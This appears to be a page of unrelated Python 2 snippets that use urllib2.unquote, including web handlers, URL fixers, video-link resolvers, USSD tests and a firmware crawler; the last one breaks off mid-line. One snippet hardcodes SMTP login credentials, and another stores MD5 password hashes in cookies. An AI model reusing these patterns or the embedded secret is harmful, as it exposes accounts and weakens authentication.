Пример #1
0
    def get(self, *args):        
        logging.debug('RootHandler:GET')
        variables = {}
        query = Project.all()
        query.order('-date_updated')
        projects = query.fetch(12)
        
        user = self.get_current_user()
        variables.update({'user':user})
        variables.update({'logout':users.create_logout_url(self.request.uri)})
        variables.update({'login': users.create_login_url(self.request.uri)})
        variables.update({'controller':self})
        
        variables.update({'projects':projects})
        logging.info('GET index.html -- ')
        
        message=self.get_argument('m',None)
        if message:
            message=urllib2.unquote(message)
            variables.update({'msg': message})
            
        err_msg=self.get_argument('e',None)
        if err_msg:
            err_msg=urllib2.unquote(err_msg)
            variables.update({'err_msg': err_msg})

        content = self.render_template('index.html', variables)
        self.write(content)
Пример #2
0
    def _cleanstr(self, str):
        str = str.strip()
        if str.find("function") == 0:
            pattern = (r"=\"([^\"]+).*}\s*\((\d+)\)")
            args = re.search(pattern, str, re.DOTALL)
            if args:
                a = args.groups()

                def openload_re(match):
                    c = match.group(0)
                    b = ord(c) + int(a[1])
                    return chr(b if (90 if c <= "Z" else 122) >= b else b - 26)

                str = re.sub(r"[a-zA-Z]", openload_re, a[0]);
                str = urllib2.unquote(str)

        elif str.find("decodeURIComponent") == 0:
            str = re.sub(r"(^decodeURIComponent\s*\(\s*('|\"))|(('|\")\s*\)$)", "", str);
            str = urllib2.unquote(str)
        elif str.find("\"") == 0:
            str = re.sub(r"(^\")|(\"$)|(\".*?\")", "", str);
        elif str.find("'") == 0:
            str = re.sub(r"(^')|('$)|('.*?')", "", str);

        return str
Пример #3
0
def _is_fetching_self(url, method):
  """Checks if the fetch is for the same URL from which it originated.

  Args:
    url: str, The URL being fetched.
    method: value from _VALID_METHODS.

  Returns:
    boolean indicating whether or not it seems that the app is trying to fetch
      itself.
  """
  if (method != GET or
      "HTTP_HOST" not in os.environ or
      "PATH_INFO" not in os.environ):
    return False

  scheme, host_port, path, query, fragment = urlparse.urlsplit(url)

  if host_port == os.environ['HTTP_HOST']:
    current_path = urllib2.unquote(os.environ['PATH_INFO'])
    desired_path = urllib2.unquote(path)

    if (current_path == desired_path or
        (current_path in ('', '/') and desired_path in ('', '/'))):
      return True

  return False
Пример #4
0
def convert_utf8_url_to_ascii(url):
    """
    taken from http://stackoverflow.com/questions/804336/best-way-to-convert-a-unicode-url-to-ascii-utf-8-percent-escaped-in-python
    """
       # turn string into unicode
    if not isinstance(url, unicode):
        url = url.decode('utf8')

    # parse it
    parsed = urlparse.urlsplit(url)

    # divide the netloc further
    userpass, at, hostport = parsed.netloc.rpartition('@')
    user, colon1, pass_ = userpass.partition(':')
    host, colon2, port = hostport.partition(':')

    # encode each component
    scheme = parsed.scheme.encode('utf8')
    user = urllib2.quote(user.encode('utf8'))
    colon1 = colon1.encode('utf8')
    pass_ = urllib2.quote(pass_.encode('utf8'))
    at = at.encode('utf8')
    host = host.encode('idna')
    colon2 = colon2.encode('utf8')
    port = port.encode('utf8')
    # could be encoded slashes!
    path = '/'.join(urllib2.quote(urllib2.unquote(pce).encode('utf8'), '')
                    for pce in parsed.path.split('/'))
    query = urllib2.quote(urllib2.unquote(parsed.query).encode('utf8'), '=&?/')
    fragment = urllib2.quote(urllib2.unquote(parsed.fragment).encode('utf8'))

    # put it back together
    netloc = ''.join((user, colon1, pass_, at, host, colon2, port))
    return urlparse.urlunsplit((scheme, netloc, path, query, fragment))
Пример #5
0
    def resolve_url(self, url, connection, arguments={}):
        handler = None
        args = []
        kwargs = {}

        # unable to check host at the moment, so just loop over all handlers
        for pattern, handlers in self.application.handlers:
            for spec in handlers:
                if issubclass(spec.handler_class, AiryHandler):
                    match = spec.regex.match(url)
                    if match:
                        if spec.regex.groups:
                            # None-safe wrapper around url_unescape to handle
                            # unmatched optional groups correctly
                            def unquote(s):
                                if s is None:
                                    return s
                                return escape.url_unescape(s, encoding=None)
                                # Pass matched groups to the handler.  Since

                            # match.groups() includes both named and unnamed groups,
                            # we want to use either groups or groupdict but not both.
                            # Note that args are passed as bytes so the handler can
                            # decide what encoding to use.

                            if spec.regex.groupindex:
                                kwargs = dict((k, unquote(v)) for (k, v) in match.groupdict().iteritems())
                            else:
                                args = [unquote(s) for s in match.groups()]
                        handler = spec.handler_class(self, connection, arguments, **spec.kwargs)
                        break

        return handler, args, kwargs
    def get_media_url(self, host, media_id):
        try:
            url = self.get_url(host, media_id)
            html = self.net.http_GET(url).content
    
            err = re.compile('<p class="err">(.+?)<br>').findall(html)
            if err:
                raise Exception (str(err))
    
            data = {}
            r = re.findall(r'type="(?:hidden|submit)?" name="(.+?)"\s* value="?(.+?)">', html)
            for name, value in r:
                data[name] = value
                data.update({'down_direct':1})
            
            common.addon.show_countdown(45, title='Muchshare', text='Loading Video...')
            html = net.http_POST(url, data).content
            r = re.search("(?:.+var file_link = \'|.+\<a id=\"lnk_download\" href=\")(.+?)(?:\'|\"\>)", html).group(1)
            urllib2.unquote(r)
            return r

        except Exception, e:
            common.addon.log('**** Muchshare Error occured: %s' % e)
            common.addon.show_small_popup('Error', str(e), 5000, '')
            return self.unresolvable(code=0, msg=e)
Пример #7
0
 def set_language(self):
     "Set the language"
     nextpage = request.params.get('next', None)
     if not nextpage:
         nextpage = request.headers.get('Referer', None)
     if not nextpage:
         nextpage = '/'
     if '://' in nextpage:
         from_url = urlparse(nextpage)
         nextpage = from_url[2]
     lang_code = request.params.get('language', None)
     if lang_code and check_language(lang_code):
         session['lang'] = lang_code
         session.save()
     params = []
     for param in request.params:
         if not param in ['language', 'amp']:
             value = request.params[param]
             if value:
                 if (param == 'came_from' and
                     '://' in urllib2.unquote(value)):
                     urlparts = urlparse(urllib2.unquote(value))
                     value = urlparts[2] or '/'
                 params.append('%s=%s' % (urllib2.quote(param),
                                         urllib2.quote(value)))
     if 'lc=1' not in params:
         params.append('lc=1')
     if params:
         nextpage = "%s?%s" % (nextpage, '&amp;'.join(params))
     redirect(nextpage)
Пример #8
0
def egg_info_for_url(url):
    scheme, server, path, parameters, query, fragment = urlparse.urlparse(url)
    base = urllib2.unquote(path.split('/')[-1])
    if server=='sourceforge.net' and base=='download':    # XXX Yuck
        base = urllib2.unquote(path.split('/')[-2])
    if '#' in base: base, fragment = base.split('#',1)
    return base,fragment
Пример #9
0
 def post(self):
   username = self.request.get('username')
   lua_script = urllib2.unquote(base64.b64decode(
       self.request.get('lua_script')))
   lua_aggregator = urllib2.unquote(base64.b64decode(
       self.request.get('lua_aggregator')))
   _AddLuaTask(self.request, username, lua_script, lua_aggregator)
Пример #10
0
    def post(self):
        """
        @api {POST}      /image/  Insert an image
        @apiName         InsertImage
        @apiGroup        Insert
        @apiDescription  Insert an image.

        @apiParam   {String}  id    The student ID.
        @apiParam   {String}  url   The image URL or absolute local file path.

        @apiParamExample  {json}  Request-Example:
                          {"id": "001", "name":"jmei"}

        @apiSuccess {String}  success  ok

        @apiUse    RequestParsingErrors
        @apiError  409  Inserting image ID have already exist.

        @apiVersion 1.0.0
        """
        try:
            id, url, data = self.read_request('id', 'url')

            _config()
            logging.info(urllib2.unquote(url))
            img = uploader.upload(urllib2.unquote(url))
            try:
                self.db.image.insert({'_id': img['public_id'], 'sid': id})
            except errors.DuplicateKeyError:
                self.send_error(409, message="image id have already exist.")

            self.response['success'] = 'ok'
            self.write_response()
        except base.ErrorSentException:
            pass
def main():
    if len(sys.argv) == 1:
        dom = parseString(urlopen(XML_URL, data=POST_BODY).read())
    elif len(sys.argv) == 2:
        filename = sys.argv[1]
        if not os.path.exists(filename):
            print "File not found"
            return 1
        dom = parse(filename)
    else:
        print "Invalid arguments."
        return 1
    
    data = unquote(dom.getElementsByTagName("data").pop().lastChild.toxml()).split(':')[1].split(',')
    
    for i in range(0, len(data), len(FIELDS)):
        t_fields = data[i:i+len(FIELDS)]
        d = dict(zip(FIELDS, t_fields))
        d['url'] = unquote(d['url'])
        d['flv_url'] = unquote(d['flv_url'])
        d['rtmp_url'] = unquote(d['rtmp_url'])
        
        print d['title'].replace('+', ' ')
        print d['url']
        print d['rtmp_url']
        print    
Пример #12
0
 def saveContent(self, isPage=False, content=None, targeturl='http://www.example.com/dir/example.txt'):
     #example : we have a file http://example.com/dir/somefile.txt
     #rooturl = http://example.com/
     #url - rooturl = dir/somefile.txt
     pos = u'./'
     MIME = None
     if(content is None):
         try:
             content,code,MIME = self.http_get(targeturl)
         except:
             print "FAIL over 30 times , giving up"
             return "ERROR", targeturl
     elif(isPage is True):
         MIME = u'text/html'
     try:
         filename = self.get_filename(MIME,  urllib2.unquote(targeturl.encode('utf-8')).decode('utf-8'))
     except UnicodeEncodeError:
         splits = filename
     if(isPage):
         pos = os.path.join(pos, filename)
         self.filesdir = urllib2.unquote(filename.split('.')[0]) + u'_files'
         if(not os.path.exists(os.path.join(self.tmpdir, self.filesdir))):
             os.mkdir(os.path.join(self.tmpdir, self.filesdir))
     else:
         pos = os.path.join(os.path.join(pos, self.filesdir), filename)
     try:
         ofile = open(os.path.join(self.tmpdir, pos),'wb')
         ofile.write(content)
         ofile.close()
     except IOError:
         print "Unable to save " + targeturl
     return content, pos
Пример #13
0
    def http_get(self, url):
            MIME = '*/*'
            unquoteurl = urllib2.unquote(url.encode('utf-8'))
            scheme,netloc,url,params,query,fragment = urlparse(unquoteurl)
	    netloc=urllib2.quote(netloc)
            url = urllib2.quote(url)
            url = ParseResult( scheme,netloc,url,params,query,fragment ).geturl()
            retries = 30
            i = 0
            while(True):
                try:
                    if(self.useproxy):
			print 'using proxy'
                        response = self.opener.open(url,timeout=5)
                        print("GET "  + urllib2.unquote(response.geturl().encode()) + " " + str(response.code))
                        if('content-type' in response.headers):
                            MIME = response.headers['content-type'].split(';')[0]
			print response
                        return response.read(), response.code, MIME
                    else:
                        response = requests.get(url)
                        print("GET "  + urllib2.unquote(str(response.url)) + " " + str(response.status_code))
                        if('content-type' in response.headers):
                            MIME = response.headers['content-type'].split(';')[0]
                        return response.content, response.status_code, MIME
                except:
                    if(i > retries):
                        print traceback.print_exc()
                        raise sys.exc_info()[0]
                    print "timeout 5000ms"
                    i += 1
Пример #14
0
def docs(docs=None, q=None):
    response.content_type = 'application/json; charset=UTF8'
    response.set_header('Expires', _cache_date())
    
    try:
        if request.query.q:
            q = unquote(request.query.q)
    except:
        pass

    try: 
        if request.query.id:
            docs = [unquote(request.query.id)]
    except:
        pass
    
    try: 
        response.set_header('Expires', 0)
        response.set_header('Pragma', 'no-cache')
        response.set_header('Cache-Control', 'no-cache, no-store, must-revalidate')
        if request.query.random:
            docs = [np.random.choice(lda_v.corpus.view_metadata(context_type)[doc_label_name(context_type)])]
    except:
        pass

    js = get_docs(docs, query=q)

    return json.dumps(js)
def grab(secondary_url):
    global DEPTH
    global LIMIT_DEPTH

    if (secondary_url, DEPTH) in URLS:
        return True

    URLS.append((secondary_url, DEPTH))

    filename = urllib2.unquote(secondary_url.split('/')[-1])
    filename, isimg = fix_image(filename)

    if exist(filename):
        return True

    if isimg:
        get_wiki_image(secondary_url)
        return True

    if DEPTH > LIMIT_DEPTH:
        return True

    print '[%d]' % DEPTH, '--' * DEPTH, 'parsing...\t', urllib2.unquote(secondary_url)
    DEPTH += 1

    try:
        first_page = urllib2.urlopen(URL_BASE + secondary_url)
    except Exception, inst:
        print URL_BASE + urllib2.unquote(secondary_url), 'no existe'
        return False
Пример #16
0
    def read(self, input_file):
        """ Reads an InputHeader from `input_file`.

        The input header is read as a sequence of *<key>***:***<value>* pairs
        separated by a newline. The end of the input header is signalled by an
        empty line or an end-of-file.

        :param input_file: File-like object that supports iteration over lines

        """
        key, value = None, None
        import sys
        for line in input_file:
            if line == '\n':
                break
            if line[-1:] == '\n':
                line = line[:-1]
            item = line.split(':', 1)
            if len(item) == 2:
                # start of a new item
                self._update(key, value)
                key, value = item[0], urllib.unquote(item[1])
            elif key is not None:
                # continuation of the current item
                value = '\n'.join([value, urllib.unquote(line)])

        self._update(key, value)
        return
Пример #17
0
def getImage(url, h=None, w=None, o=100, auth=None, **kwargs):
    # Create image directory if it doesnt exist
    imgdir = os.path.join(htpc.datadir, 'images/')
    if not os.path.exists(imgdir):
        os.makedirs(imgdir)

    fileName = unquote(unquote(url)).rsplit('/', 1).pop()
    imgName, imgType = fileName.rsplit('.', 1)

    original = resized = os.path.join(imgdir, imgType+'_'+imgName+'.png')
    if h and w:
        resized = os.path.join(imgdir, original+'_'+w+'_'+h+'.png')

    # If there is no local copy of the original
    if not os.path.isfile(original):
        original = downloadImage(url, original, auth)

    if not original:
        print "Error downloading image"
        raise cherrypy.NotFound(fileName)

    # If there is no local resized copy
    if not os.path.isfile(resized):
        resized = resizeImage(original, h, w, o, resized)

    if not resized:
        resized = original

    # Load file from disk
    return serve_file(path=resized, content_type='image/png')
Пример #18
0
    def post(self):
        self.response.headers['Content-Type'] = 'application/json;charset=utf-8'
        account = urllib2.unquote(self.request.get('account')).encode('utf-8')
        contacts = urllib2.unquote(self.request.get('contacts')).encode('utf-8')
        accountInfo = json.loads(account)
        contactInfo = json.loads(contacts)

        username = accountInfo['email']
        access_token = accountInfo['access_token']

        g = Gmail()
        try:
            g.authenticate(username, access_token)

            context = {}
            for contact in contactInfo['contacts']:
                emails = None
                emails = g.sent().mail(to=contact)
                numEmails = len(emails)
                context[contact]=numEmails

            g.logout()
            self.response.out.write(json.dumps(context))

        except Exception, e:
            print "Authentication failure."
            print "Error:",str(e)
            return
Пример #19
0
    def title(self):
        """Return a title for this annotation.

        Return the annotated document's title or if the document has no title
        then return its filename (if it's a file:// URI) or its URI for
        non-file URIs.

        The title is escaped and safe to be rendered.

        If it contains escaped characters then the title will be a
        Markup object, so that it won't be double-escaped.

        """
        document_ = self.annotation.document
        if document_:
            try:
                title = document_["title"]
            except (KeyError, TypeError):
                # Sometimes document_ has no "title" key or isn't a dict at
                # all.
                title = u""
            if title:
                # Convert non-string titles into strings.
                # We're assuming that title cannot be a byte string.
                title = unicode(title)

                return jinja2.escape(title)

        if self.filename:
            return jinja2.escape(urllib2.unquote(self.filename))
        else:
            return jinja2.escape(urllib2.unquote(self.uri))
Пример #20
0
    def success(self):
        print self.msg
        self.process_map["FILE"] = "success.html"
        sender = self.msg["email"]
        receivers = ['*****@*****.**']
        subject = "[loframe_code]" + self.msg["name"]
        rawcode = self.msg["code"]
        text = urllib2.unquote(rawcode)
        text = urllib2.unquote(text)

        message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
            """ % (sender, ", ".join(receivers), subject, text)

        txt_confirm = "This is the email confirming you have successfully submitted your code."
        msg_rpy = """\From: %s\nTo: %s\nSubject: %s\n\n%s
            """ % (sender, ", ".join(receivers), subject, txt_confirm)
        y_name = "*****@*****.**"
        y_pwd = "09df64ea8f402b4e56efeacb5b5b09c3"
        smtpserver = smtplib.SMTP("smtp.mailgun.org",587)
        smtpserver.ehlo()
        smtpserver.starttls()
        smtpserver.ehlo() 
        smtpserver.login(y_name, y_pwd)
        smtpserver.sendmail("*****@*****.**", receivers[0], message)
        smtpserver.sendmail("*****@*****.**", sender, msg_rpy)
        smtpserver.close()
Пример #21
0
def getSimilarNotes():
    """
        Return a set of similar notes
        based on the input id and topN
    """
    if request.method == 'POST':
        # POST request
        id = urllib2.unquote(request.form['id'])  # Fetching the id of note to delete from the user request
        topN = urllib2.unquote(request.form["topn"])
    else:
        # GET request
        id = urllib2.unquote(request.args.get('id', ''))
        topN = urllib2.unquote(request.args.get('topn', ''))

    results = snotes.getSimilarItems(id, topN)

    response =  {}
    response["success"] = "true"
    response["num"] = len(results)
    response["notes"] = []
    for (resultId, sim) in results:
        note = snotes.getNote(resultId)
        temp = {}
        temp["id"] = resultId
        temp["similarity"] = sim
        temp["note"] = note
        response["notes"].append(temp)

    return json.dumps(response)
Пример #22
0
 def _download(self, path, download_url):
     self.path = path
     
     d = curl()
     filename, download_html = d._curl(self.path)
     _number_pages = re.search('yui3-appsview-page-ellipsis">.*?</span>.*?<a  title="第(.+?)页"', download_html, re.DOTALL)
     try:
         os.makedirs('./Tinkerbell/downloads/m163')
     except OSError:
         pass
     os.chdir("./Tinkerbell/downloads/m163")
     for i in range(1, int(_number_pages.group(1))+1):
         self.download_url = download_url + str(i) + ".html"
         filename, download_html = d._curl(self.download_url)
         _log("Downloading from %s" % unquote(self.download_url))
         found = re.findall('m-t5">.*?<a href="(.+?)"', download_html, re.DOTALL)
         for _apk_link in found:
             filename = os.path.basename(_apk_link)
             filename = re.findall('%2Ffile.m.163.com%2Fapp%2Ffree%2F.*?%2F.*?%2F(.+?).apk', filename, re.DOTALL)
             if len(filename)!=0:
                 _download_name = repr(unquote(filename[0])).replace('\'','')
                 _download_name = _download_name.replace('u\\','').replace('\\','')
                 _download_name = _download_name.split('/', 1)[-1] + ".apk"
                 d._download_apk(_apk_link,_download_name)
     os.chdir('../../../')
Пример #23
0
def loadVideos(url,name):
        #try:
           newlink=url
           print newlink
           xbmc.executebuiltin("XBMC.Notification(Please Wait!,Loading selected video)")
           if (newlink.find("dailymotion") > -1):
                match=re.compile('(dailymotion\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)').findall(newlink)
                lastmatch = match[0][len(match[0])-1]
                link = 'http://www.dailymotion.com/'+str(lastmatch)
                req = urllib2.Request(link)
                req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3')
                response = urllib2.urlopen(req)
                link=response.read()
                response.close()
                sequence=re.compile('"sequence",  "(.+?)"').findall(link)
                newseqeunce = urllib.unquote(sequence[0]).decode('utf8').replace('\\/','/')
                #print 'in dailymontion:' + str(newseqeunce)
                imgSrc=re.compile('"videoPreviewURL":"(.+?)"').findall(newseqeunce)
                if(len(imgSrc[0]) == 0):
                	imgSrc=re.compile('/jpeg" href="(.+?)"').findall(link)
                dm_low=re.compile('"sdURL":"(.+?)"').findall(newseqeunce)
                dm_high=re.compile('"hqURL":"(.+?)"').findall(newseqeunce)
                playVideo('dailymontion',urllib2.unquote(dm_low[0]).decode("utf8"))
           elif (newlink.find("docs.google.com") > -1):  
                vidcontent = GetContent(newlink)
                html = vidcontent.decode('utf8')
                stream_map = re.compile('fmt_stream_map","(.+?)"').findall(html)[0].replace("\/", "/")
                formatArray = stream_map.split(',')
                for formatContent in formatArray:
                     formatContentInfo = formatContent.split('|')
                     qual = formatContentInfo[0]
                     url = (formatContentInfo[1]).decode('unicode-escape')
                     playVideo("direct",url)
           elif (newlink.find("4shared") > -1):
                d = xbmcgui.Dialog()
                d.ok('Not Implemented','Sorry 4Shared links',' not implemented yet')		
           elif (newlink.find("vimeo") > -1):
                idmatch =re.compile("http://player.vimeo.com/video/([^\?&\"\'>]+)").findall(newlink)
                if(len(idmatch) > 0):
                        idmatch=idmatch[0].replace("'","")
                else:
                        idmatch =re.compile("//vimeo.com/(.+?)dk").findall(newlink+"dk")
                        idmatch=idmatch[0].replace("'","")
                playVideo('vimeo',idmatch)
           else:
                if (newlink.find("linksend.net") > -1):
                     d = xbmcgui.Dialog()
                     d.ok('Not Implemented','Sorry videos on linksend.net does not work','Site seem to not exist')		
                newlink1 = urllib2.unquote(newlink).decode("utf8")+'&dk;'
                print 'NEW url = '+ newlink1
                match=re.compile('(youtu\.be\/|youtube-nocookie\.com\/|youtube\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)').findall(newlink1)
                if(len(match) == 0):
                    match=re.compile('http://www.youtube.com/watch\?v=(.+?)&dk;').findall(newlink1)
                if(len(match) > 0):
                    lastmatch = match[0][len(match[0])-1].replace('v/','')
                    #d = xbmcgui.Dialog()
                    #d.ok('mode 2',str(lastmatch),'launching yout')
                    playVideo('youtube',lastmatch)
                else:
                    playVideo('moviekhmer',urllib2.unquote(newlink).decode("utf8"))
    def test_selection_for_survey_that_has_no_sampling(self):
        open_survey = Survey.objects.create(name="open survey", description="open survey", has_sampling=False)
        with patch.object(Survey, "currently_open_survey", return_value=open_survey):
            mobile_number = self.ussd_params['msisdn'].replace(COUNTRY_PHONE_CODE, '', 1)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 0)

            response_message = "responseString=%s&action=request" % HouseHoldSelection.MESSAGES['HOUSEHOLDS_COUNT_QUESTION']

            response = self.client.get('/ussd', data=self.ussd_params)
            self.failUnlessEqual(response.status_code, 200)
            self.assertEquals(urllib2.unquote(response.content), response_message)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 0)

            self.ussd_params['response'] = "true"
            self.ussd_params['ussdRequestString'] = " 100 "

            response_message = "responseString=%s&action=end" % HouseHoldSelection.MESSAGES[
                'HOUSEHOLD_CONFIRMATION_MESSAGE']
            response = self.client.get('/ussd', data=self.ussd_params)
            self.failUnlessEqual(response.status_code, 200)
            self.assertEquals(urllib2.unquote(response.content), response_message)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 1)

            household_selection = RandomHouseHoldSelection.objects.all()[0]
            self.assertEquals(household_selection.mobile_number, mobile_number)
            self.assertEquals(household_selection.no_of_households, 100)
            selected_households = household_selection.selected_households.split(',')
            self.assertEquals(len(selected_households), 100)

            message = BackendMessage.objects.filter(identity=self.ussd_params['msisdn'])
            self.failIf(message)
def _get_video_link_dict(url):
	header = {'GData-Version' : '3.0' }
	req = urllib2.Request(url, None, header)
	try:
		response = urllib2.urlopen(req)
	except urllib2.URLError as e:
		if hasattr(e, 'reason'):
			raise RuntimeError(str(e.reason))
		elif hasattr(e, 'code'):
			raise RuntimeError(str(e.code))
	else:
		response_data = response.read()

	re_stream_map = re.compile(r'"url_encoded_fmt_stream_map": "(.+?)"')
	re_adaptive_fmts = re.compile(r'"adaptive_fmts": "(.+?)"')
	re_url = re.compile(r'url=(.+?)(?:,|\\)')
	re_itag = re.compile(r'itag=(\d+)')

	stream_map = re.search(re_stream_map, response_data).group(1)
	adaptive_fmts = re.search(re_adaptive_fmts, response_data).group(1)

	video_info = stream_map + adaptive_fmts
	
	urls = re.findall(re_url, video_info)

	url_dict = {}

	for u in urls:
		u = urllib2.unquote(urllib2.unquote(u))
		itag = re.search(re_itag, u).group(1)
		url_dict[str(itag)] = u
	
	return url_dict
Пример #26
0
 def changepassword(self, fields):
     time.sleep(1)
     d={urllib2.unquote(i.split('=')[0]):urllib2.unquote(i.split('=')[1]) for i in [tmp for tmp in fields.split('&')]}
     oldpassword=d['oldpassword']
     newpassword1=d['newpassword1']
     newpassword2=d['newpassword2']
     user=checkPassword()
     if not user:
         return """You have been logged out.  <a href="/home/login">Log in</a>."""
     if oldpassword=='' or newpassword1=='' or newpassword2=='':
         return 'You need to fill in all the required password data'
     if newpassword1!=newpassword2:
         return "You entered your new password incorrectly.  Please try again."
     elif len(newpassword1)<=5:
         return "<p>Your password needs to be greater than 5 characters</p>" 
     oldpass=hashlib.md5((oldpassword+salt).encode('utf-8')).hexdigest()
     newpass=hashlib.md5((newpassword1+salt).encode('utf-8')).hexdigest()
     ## RESET COOKIE
     cookie = cherrypy.response.cookie
     sida=user
     sidb=newpass
     cookie['sida']=sida
     cookie['sida']['expires'] = 12 * 30 * 24 * 60 * 60
     cookie['sida']["path"] = "/"
     cookie['sidb']=sidb
     cookie['sidb']['expires'] = 12 * 30 * 24 * 60 * 60
     cookie['sidb']["path"] = "/"
     cherrypy.request.cookie=cookie
     
     data=db.execute("""SELECT id FROM lab_members WHERE name=%s AND password=%s""", (user,oldpass), commit=False)
     if len(data)==0:
         return "Your password is incorrect."
     db.execute('''UPDATE lab_members SET  password=%s WHERE name=%s''', (newpass, user))
     return 'Your password has been updated!'
    def test_selection(self):
        with patch.object(Survey, "currently_open_survey", return_value=self.open_survey):
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 0)

            response_message = "responseString=%s&action=request" % HouseHoldSelection.MESSAGES['HOUSEHOLDS_COUNT_QUESTION']
            response = self.client.get('/ussd', data=self.ussd_params)
            self.failUnlessEqual(response.status_code, 200)
            self.assertEquals(urllib2.unquote(response.content), response_message)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 0)

            self.ussd_params['response'] = "true"
            self.ussd_params['ussdRequestString'] = " 100 "

            response_message = "responseString=%s&action=end" % HouseHoldSelection.MESSAGES[
                'HOUSEHOLD_SELECTION_SMS_MESSAGE']
            response = self.client.get('/ussd', data=self.ussd_params)
            self.failUnlessEqual(response.status_code, 200)
            self.assertEquals(urllib2.unquote(response.content), response_message)
            self.assertEquals(RandomHouseHoldSelection.objects.count(), 1)

            household_selection = RandomHouseHoldSelection.objects.all()[0]
            mobile_number = self.ussd_params['msisdn'].replace(COUNTRY_PHONE_CODE, '', 1)
            self.assertEquals(household_selection.mobile_number, mobile_number)
            self.assertEquals(household_selection.no_of_households, 100)
            selected_households = household_selection.selected_households.split(',')
            self.assertEquals(len(selected_households), 10)

            message = BackendMessage.objects.get(identity=self.ussd_params['msisdn'])
            self.assertEquals(message.text, household_selection.text_message())
    def test_with_one_batch_open(self):
        self.batch.open_for_location(self.location)

        self.assertEquals(HouseholdMemberBatchCompletion.objects.count(), 0)
        mock_filter = MagicMock()
        mock_filter.exists.return_value = True
        with patch.object(RandomHouseHoldSelection.objects, 'filter', return_value=mock_filter):
            with patch.object(USSDSurvey, 'is_active', return_value=False):
                self.reset_session()

                self.choose_menu_to_take_survey()
                self.select_household()
                response = self.select_household_member()
                response_string = "responseString=%s&action=request" % self.question_1.to_ussd()
                self.assertEquals(urllib2.unquote(response.content), response_string)

                response = self.respond("1")
                response_string = "responseString=%s&action=request" % self.question_2.to_ussd()
                self.assertEquals(urllib2.unquote(response.content), response_string)

                response = self.respond("1")
                response_string = "responseString=%s&action=request" % USSD.MESSAGES['HOUSEHOLD_COMPLETION_MESSAGE']
                self.assertEquals(urllib2.unquote(response.content), response_string)

                self.assertEquals(HouseholdMemberBatchCompletion.objects.count(), 1)
                household_completed = HouseholdMemberBatchCompletion.objects.latest('id')
                self.assertEquals(household_completed.household, self.household)
                self.assertEquals(household_completed.investigator, self.investigator)
                self.assertEquals(household_completed.batch, self.batch)
Пример #29
0
def lambe(orgao_a, estado_a, orgao_b, estado_b, raw=False):
    orgao_a = unquote(orgao_a)
    estado_a = unquote(estado_a)
    orgao_b = unquote(orgao_b)
    estado_b = unquote(estado_b)

    l = {
        "a": {"estado": estado_a, "orgao": orgao_a, "valor": lambes[orgao_a][estado_a]},
        "b": {"estado": estado_b, "orgao": orgao_b, "valor": lambes[orgao_b][estado_b]},
    }

    if l["a"]["valor"] <= l["b"]["valor"]:
        l["proporcao"] = "menos"
        # hackish?
        l["razao"] = round((l["b"]["valor"] - l["a"]["valor"]) / l["a"]["valor"], 1)
        l["razao_g"] = round(l["b"]["valor"] / l["a"]["valor"], 1)
    else:
        l["proporcao"] = "mais"
        l["razao"] = round(l["a"]["valor"] / l["b"]["valor"], 1)
    image_path = unidecode("-".join([l["a"]["orgao"], l["a"]["estado"], l["b"]["orgao"], l["b"]["estado"]]))

    if os.path.isfile(here + "/static/raw/" + image_path + "-hi.png"):
        l["image"] = image_path
    else:
        if not raw:
            t = threading.Thread(target=generate_image, args=(l, 3))
            t.start()
    return render_template("lambe.html", l=l)
Пример #30
0
def fixurl(url):
    # turn string into unicode
    if not isinstance(url,unicode):
        url = url.decode('utf8')

    # parse it
    parsed = urlparse.urlsplit(url)

    # divide the netloc further
    userpass,at,hostport = parsed.netloc.rpartition('@')
    user,colon1,pass_ = userpass.partition(':')
    host,colon2,port = hostport.partition(':')

    # encode each component
    scheme = parsed.scheme.encode('utf8')
    user = urllib2.quote(user.encode('utf8'))
    colon1 = colon1.encode('utf8')
    pass_ = urllib2.quote(pass_.encode('utf8'))
    at = at.encode('utf8')
    host = host.encode('idna')
    colon2 = colon2.encode('utf8')
    port = port.encode('utf8')
    path = '/'.join(  # could be encoded slashes!
        urllib2.quote(urllib2.unquote(pce).encode('utf8'),'')
        for pce in parsed.path.split('/')
    )
    query = urllib2.quote(urllib2.unquote(parsed.query).encode('utf8'),'=&?/')
    fragment = urllib2.quote(urllib2.unquote(parsed.fragment).encode('utf8'))

    # put it back together
    netloc = ''.join((user,colon1,pass_,at,host,colon2,port))
    return urlparse.urlunsplit((scheme,netloc,path,query,fragment))
Пример #31
0
 def decode_url(self):
     #print url
     #print repr(urllib2.unquote(url))
     return urllib2.unquote(self.image_url)
    def parse_page(self, response):
        lists = response.selector.xpath(
            '//table[@id="datatable-checkbox"]/tbody/tr[position()>1]')
        prototype = response.meta['prototype']

        for i in lists:
            listsdownbutton = i.xpath(
                './td[4]/a/@href').extract()  #file but not directory

            if not listsdownbutton:  # it is directory
                dirurl = i.xpath('./td[1]/a[1]/@href').extract()
                absurl = urlparse.urljoin(response.url, dirurl[0])
                request = scrapy.Request(absurl, callback=self.parse_page)
                request.meta["prototype"] = response.meta["prototype"]
                yield request
            else:
                #get information
                absurlfile = urlparse.urljoin(response.url, listsdownbutton[0])
                filename = absurlfile.rsplit('/', 1)[-1]
                filename = urllib2.unquote(
                    filename)  #unquoto mean end quote,and decode
                filetype = filename.split('.')[-1]
                publishtime = i.xpath('./td[3]/text()').extract()[0]
                hikvisionSpider.allsuffix.add(filetype)

                if filetype in hikvisionSpider.suffix:
                    # print "zhua qu"
                    item = MI.FirmcrawlerItem(prototype)
                    item["firmwareName"] = filename
                    item["crawlerTime"] = time.strftime("%Y-%m-%d %H:%M:%S")
                    item["url"] = absurlfile
                    item["publishTime"] = publishtime
                    item["description"] = absurlfile.split(
                        '/')[5] + "/" + absurlfile.split('/')[6]
                    item["productVersion"] = ""
                    item["productModel"] = ""
                    item["productClass"] = ""  #waiting for doing it

                    #version
                    regVersion = re.compile(
                        r'[V,v]*[0-9]\.[0-9][0-9]*\.*[0-9]*[0-9]*')
                    regVersions = regVersion.search(filename)
                    if regVersions:  # 当固件名中版本号存在时,型号一定存在
